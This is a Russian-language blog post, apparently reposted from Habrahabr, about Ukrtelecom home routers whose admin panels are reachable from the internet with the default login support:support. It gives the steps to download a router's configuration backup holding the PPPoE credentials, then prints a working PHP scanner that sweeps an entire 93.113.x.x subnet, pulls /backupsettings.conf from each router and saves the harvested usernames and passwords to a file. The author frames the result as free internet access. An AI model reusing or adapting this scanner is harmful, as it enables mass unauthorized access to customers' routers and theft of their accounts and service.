Бувально пару часов назад я заметил, что роутеры Укртелекома доступны из сети и при заходе по их ip доступна панель управления роутером и telnet.
Первой мыслью было одно — найти стандартный пароль для таких роутеров.
После минутного поиска цель была достигнута, логин: пароль — support:support.
Ввожу данные в форму и, как не странно, открывается web-панель управления:
Дальнейшее действие — получить данные от PPPoE соединения: переходим в «Management» -> «Settings» -> «Backup» -> нажимаем «Backup settings». После этих действий в ваших руках оказывается XML-файл, в котором содержатся все настройки роутера, в ком числе логин и пароль от PPPoE.
Но на этом плюшки не заканчиваются! Следующая мысль — написать сканер подсети.
Пример кода ниже:
<?php set_time_limit(0); $access = 'support:support'; // логин:пароль $one = '93.113'; // начало подсети (без точки) function backup($ip, $access) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, 'http://'.$ip.'/backupsettings.conf'); curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate'); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); // curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT_MS, 200); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERPWD, $access); $buffer = curl_exec($curl); curl_close($curl); if(!empty($buffer)) { return simplexml_load_string($buffer)->InternetGatewayDevice->WANDevice->WANConnectionDevice->WANPPPConnection; } else return false; } for($a = 1; $a < 256; $a++){ // генерация цифер после второй точки for($b = 1; $b < 256; $b++){ // генерация цифер после третьей точки $file = backup($one.'.'.$a.'.'.$b, $access); // запрос к роутеру if($file) { $save = fopen('login.txt', 'a+'); fwrite($save, $file->Username.':'.$file->Password."\n"); // запись в файл fclose($save); } } } ?>
Вот и всё, за интернет можно не платить.
Исходя из этого всего нужно сделать выводы:
1. Правильная настройка роутера и свежая прошивка — защита от мошенников.
2. Скупой платит дважды.
ссылка на оригинал статьи http://habrahabr.ru/post/169669/
Добавить комментарий